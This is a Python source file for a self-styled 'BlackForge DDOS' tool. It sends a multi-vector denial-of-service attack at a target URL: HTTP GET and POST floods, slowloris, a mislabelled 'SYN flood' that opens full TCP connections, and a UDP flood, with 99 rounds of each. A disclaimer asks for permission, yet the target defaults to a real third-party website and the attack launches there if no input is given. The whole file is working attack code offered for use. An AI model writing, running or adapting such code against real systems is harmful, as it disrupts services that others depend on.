import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))

from abyss_text import abyss_print, abyss_input, AbyssColors, set_theme
import socket
import ssl
import random
import time
from urllib.parse import urlparse

def parse_target(url):
    """Parse URL and extract host, port, path, and scheme."""
    if not url.startswith(('http://', 'https://')):
        url = 'https://' + url
    
    parsed = urlparse(url)
    host = parsed.hostname
    port = parsed.port or (443 if parsed.scheme == 'https' else 80)
    path = parsed.path or '/'
    scheme = parsed.scheme
    
    return host, port, path, scheme

def http_flood(host, port, path, scheme, n=1):
    """HTTP GET Flood Attack"""
    abyss_print(f"[HTTP FLOOD] Initiating {n} request(s)...", 
                color=AbyssColors.NEON_CYAN)
    
    for i in range(n):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            
            if scheme == 'https':
                context = ssl.create_default_context()
                sock = context.wrap_socket(sock, server_hostname=host)
            
            sock.connect((host, port))
            
            # Craft HTTP GET request
            request = f"GET {path} HTTP/1.1\r\n"
            request += f"Host: {host}\r\n"
            request += f"User-Agent: Mozilla/5.0 (BlackForge/1.0)\r\n"
            request += "Connection: keep-alive\r\n\r\n"
            
            sock.send(request.encode())
            response = sock.recv(1024).decode('utf-8', errors='ignore')
            
            status_line = response.split('\r\n')[0] if response else "No response"
            abyss_print(f"  └─ Request {i+1}: {status_line}", 
                       color=AbyssColors.BRIGHT_GREEN)
            
            sock.close()
        except Exception as e:
            abyss_print(f"  └─ Request {i+1} failed: {e}", 
                       color=AbyssColors.BRIGHT_RED)

def slowloris(host, port, scheme, n=1):
    """Slowloris Attack - Slow HTTP headers"""
    abyss_print(f"[SLOWLORIS] Opening {n} slow connection(s)...", 
                color=AbyssColors.NEON_CYAN)
    
    sockets = []
    for i in range(n):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            
            if scheme == 'https':
                context = ssl.create_default_context()
                sock = context.wrap_socket(sock, server_hostname=host)
            
            sock.connect((host, port))
            sock.send(f"GET / HTTP/1.1\r\n".encode())
            sock.send(f"Host: {host}\r\n".encode())
            
            sockets.append(sock)
            abyss_print(f"  └─ Connection {i+1}: Established (sending partial headers)", 
                       color=AbyssColors.BRIGHT_GREEN)
        except Exception as e:
            abyss_print(f"  └─ Connection {i+1} failed: {e}", 
                       color=AbyssColors.BRIGHT_RED)
    
    # Send partial headers slowly
    for sock in sockets:
        try:
            sock.send(f"X-Custom-Header: {random.randint(1, 10000)}\r\n".encode())
            time.sleep(0.1)
        except:
            pass
    
    # Close all sockets
    for sock in sockets:
        try:
            sock.close()
        except:
            pass

def syn_flood(host, port, n=1):
    """SYN Flood Attack"""
    abyss_print(f"[SYN FLOOD] Initiating {n} connection(s)...", 
                color=AbyssColors.NEON_CYAN)
    
    for i in range(n):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(2)
            sock.connect((host, port))
            abyss_print(f"  └─ SYN {i+1}: Connection established", 
                       color=AbyssColors.BRIGHT_GREEN)
            sock.close()
        except Exception as e:
            abyss_print(f"  └─ SYN {i+1} failed: {e}", 
                       color=AbyssColors.BRIGHT_RED)

def udp_flood(host, port, n=1):
    """UDP Flood Attack"""
    abyss_print(f"[UDP FLOOD] Sending {n} UDP packet(s)...", 
                color=AbyssColors.NEON_CYAN)
    
    for i in range(n):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.settimeout(2)
            
            # Random payload
            payload = random._urandom(1024)
            sock.sendto(payload, (host, port))
            
            abyss_print(f"  └─ UDP Packet {i+1}: Sent ({len(payload)} bytes)", 
                       color=AbyssColors.BRIGHT_GREEN)
            sock.close()
        except Exception as e:
            abyss_print(f"  └─ UDP Packet {i+1} failed: {e}", 
                       color=AbyssColors.BRIGHT_RED)

def post_flood(host, port, path, scheme, n=1):
    """HTTP POST Flood Attack"""
    abyss_print(f"[POST FLOOD] Sending {n} POST request(s)...", 
                color=AbyssColors.NEON_CYAN)
    
    for i in range(n):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            
            if scheme == 'https':
                context = ssl.create_default_context()
                sock = context.wrap_socket(sock, server_hostname=host)
            
            sock.connect((host, port))
            
            # Craft HTTP POST request with large payload
            payload = "data=" + "A" * 1024
            request = f"POST {path} HTTP/1.1\r\n"
            request += f"Host: {host}\r\n"
            request += f"Content-Length: {len(payload)}\r\n"
            request += "Content-Type: application/x-www-form-urlencoded\r\n"
            request += "Connection: keep-alive\r\n\r\n"
            request += payload
            
            sock.send(request.encode())
            response = sock.recv(1024).decode('utf-8', errors='ignore')
            
            status_line = response.split('\r\n')[0] if response else "No response"
            abyss_print(f"  └─ POST {i+1}: {status_line}", 
                       color=AbyssColors.BRIGHT_GREEN)
            
            sock.close()
        except Exception as e:
            abyss_print(f"  └─ POST {i+1} failed: {e}", 
                       color=AbyssColors.BRIGHT_RED)

def attack_url(url, n=1):
    """Execute all DDoS attack methods on the target URL"""
    try:
        host, port, path, scheme = parse_target(url)
        
        abyss_print(f"\n◢ TARGET ACQUIRED ◣\nHost: {host}\nPort: {port}\nPath: {path}\nScheme: {scheme}", 
                    color=AbyssColors.NEON_RED,
                    outline_char="heavy",
                    padding=1)
        
        print("\n")
        
        # Execute all attack vectors
        abyss_print("═══ INITIATING MULTI-VECTOR ASSAULT ═══", 
                    color=AbyssColors.BOLD + AbyssColors.NEON_RED)
        
        print("\n")
        http_flood(host, port, path, scheme, n)
        
        print("\n")
        slowloris(host, port, scheme, n)
        
        print("\n")
        syn_flood(host, port, n)
        
        print("\n")
        udp_flood(host, port, n)
        
        print("\n")
        post_flood(host, port, path, scheme, n)
        
        print("\n")
        abyss_print("═══ ASSAULT COMPLETE ═══", 
                    color=AbyssColors.BOLD + AbyssColors.NEON_GREEN,
                    outline_char="double",
                    padding=1)
        
    except Exception as e:
        abyss_print(f"CRITICAL ERROR: {e}", 
                    color=AbyssColors.PLASMA_RED,
                    outline_char="heavy")

def main():
    set_theme("red")
    
    abyss_print("◢ BLACKFORGE DDOS ◣\n⚠", 
                outline_char="double",
                padding=1)
    
    print("\n")
    
    abyss_print("WARNING: This tool demonstrates DDoS attack vectors.\nOnly use on systems you own or have explicit permission to test.", 
                color=AbyssColors.BRIGHT_YELLOW,
                outline_char="box")
    
    print("\n")
    
    # Get target URL
    target = abyss_input("Enter target URL (default: https://openai.com): ", 
                        color=AbyssColors.NEON_CYAN)
    
    if not target.strip():
        target = "https://openai.com"
    
    print("\n")
    
    abyss_print(f"Target set to: {target}", 
                color=AbyssColors.VOID_WHITE)
    
    print("\n")
    

    attack_url(target, n=99)

if __name__ == "__main__":
    main()
